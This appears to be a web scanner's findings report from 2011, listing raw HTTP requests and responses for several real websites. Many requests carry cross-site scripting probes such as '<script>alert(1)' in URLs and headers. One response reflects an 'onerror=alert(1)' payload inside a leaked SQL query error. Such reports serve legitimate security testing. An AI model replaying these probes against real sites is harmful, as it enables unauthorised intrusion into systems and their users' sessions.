HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:09:24 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45841 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=26f28f0a } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /info.dogpl.rss/web/GE |
GET /info.dogpl.rss/web/GE Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3758658826 Set-Cookie: wsRecent=GE+Zero+Taxes X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:57:29 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 161046 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /info.dogpl.rss/web/Go |
GET /info.dogpl.rss/web/Go Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3775436042 Set-Cookie: wsRecent=Go+Daddy+CEO X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:18 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 162067 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /info.dogpl.rss/web/MLB |
GET /info.dogpl.rss/web/MLB Host: www.dogpile.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DomainUserProfile |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3808990474 Set-Cookie: wsRecent=MLB+Schedule,Web X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:56:20 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 145894 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... ansactionId=93618d10 } window.onload=fix_cookies window.onfocus=fix //--> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.force.com |
Path: | /favicon.ico |
GET /favicon.ico?31872<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.force.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 301 Moved Permanently Server: SFDC Location: http://www.salesforce.com Date: Fri, 01 Apr 2011 15:29:52 GMT Content-Length: 193 The URL has moved to <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.force.com |
Path: | /favicon.ico |
GET /favicon.ico?9e087"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.force.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 301 Moved Permanently Server: SFDC Location: http://www.salesforce.com Date: Fri, 01 Apr 2011 15:29:51 GMT Content-Length: 197 The URL has moved to <a href="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mercantila.com |
Path: | /website/shoppingcart |
POST /website/shoppingcart Host: www.mercantila.com Proxy-Connection: keep-alive Referer: http://www.mercantila.com Content-Length: 22 Origin: http://www.mercantila.com X-Prototype-Version: 1.6.0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Content-type: application/x-www-form Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mercServeBucket=merc Action=getCartCount&_= |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 17:02:41 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 997 Content-Type: text/html; charset=UTF-8 {"marr_data":"Error in query executionSELECT\r\n internal_code as INTERNAL_CODE, ref_product_id as REF_PRODUCT_ID, relation_type as RELATION_TYPE,\r\n quantity as ...[SNIP]... s\r\n WHERE\r\n ref_cart_id = {\"marr_data\":\"Error in query executionSELECT internal_code, status FROM maya_cart WHERE status = 0 AND user_id = 6451364907577995808b3c36<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mrnumber.com |
Path: | /favicon.ico |
GET /favicon.ico85bf8<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mrnumber.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 Found Location: http://mrnumber.com Content-Type: text/html Content-Length: 262 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mrnumber.com |
Path: | /favicon.ico |
GET /favicon.ico8fff9"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mrnumber.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 Found Location: http://mrnumber.com Content-Type: text/html Content-Length: 266 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mrnumber.com |
Path: | /favicon.ico |
GET /favicon.ico?593b7"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mrnumber.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 Found Location: http://mrnumber.com Content-Type: text/html Content-Length: 272 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mrnumber.com |
Path: | /favicon.ico |
GET /favicon.ico?e0fda<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.mrnumber.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 Found Location: http://mrnumber.com Content-Type: text/html Content-Length: 268 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.opinionoutpost |
Path: | /favicon.ico |
GET /favicon.icobcb49"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.opinionoutpost.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 This object has moved Content-type: text/html Content-Length: 269 Location: https://www.opiniono <html><head><title>302 - This object has moved</title></head> <body> <h1>302: This object has moved</h1> <b><p>Please click <A HREF="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.opinionoutpost |
Path: | /favicon.ico |
GET /favicon.ico?d57c0"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.opinionoutpost.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.0 302 This object has moved Content-type: text/html Content-Length: 272 Location: https://www.opiniono <html><head><title>302 - This object has moved</title></head> <body> <h1>302: This object has moved</h1> <b><p>Please click <A HREF="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.rateyourmusic |
Path: | /favicon.ico |
GET /favicon.ico933fb"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.rateyourmusic.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 302 Found Location: http://rateyourmusic.com MIME-Version: 1.0 Date: Fri, 01 Apr 2011 15:57:55 GMT Server: AOLserver/4.5.0 Content-Type: text/html; charset=utf-8 Content-Length: 357 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML> <HEAD> <TITLE>Redirection</TITLE </HEAD> <BODY> <H2>Redirection</H2> <A HREF="http://rateyou ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.rateyourmusic |
Path: | /favicon.ico |
GET /favicon.ico?413d0"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.rateyourmusic.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 302 Found Location: http://rateyourmusic.com MIME-Version: 1.0 Date: Fri, 01 Apr 2011 15:57:53 GMT Server: AOLserver/4.5.0 Content-Type: text/html; charset=utf-8 Content-Length: 406 Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML> <HEAD> <TITLE>Redirection</TITLE </HEAD> <BODY> <H2>Redirection</H2> <A HREF="http://rateyou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ecards.myfuncards |
Path: | /myfuncards/404 |
GET /myfuncards/404 HTTP/1.1 Host: ecards.myfuncards.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 /myfuncards/404 Date: Fri, 01 Apr 2011 15:58:17 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 84745 ...[SNIP]... </div> <form id="loginForm" name="loginForm" method="post" action="/registration <input name="loginEmail" id="loginEmail" class="inp-text" type="text" value="Email Address" /> <input name="loginPassword" id="loginPassword" class="inp-text" type="password" value="" /> <input class="inp-submit Clickable" type="submit" value="" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-login.php |
GET /wp-login.php HTTP/1.1 Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:58 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_test_cookie=WP Content-Length: 2231 Vary: User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... </h1> <form name="loginform" id="loginform" action="http://www <p> ...[SNIP]... <br /> <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.beatthetraffic User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FC1-WC=^54463_2_2v0tA; __utmz=57563192 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web82 Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/ Set-Cookie: cwbh1=357%3B05%2F01 Content-Type: image/gif Date: Fri, 01 Apr 2011 18:11:05 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.maybenow.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.maybenow.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:02:17 GMT Content-Length: 13703 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><meta http- ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5MzA2Nzk4 |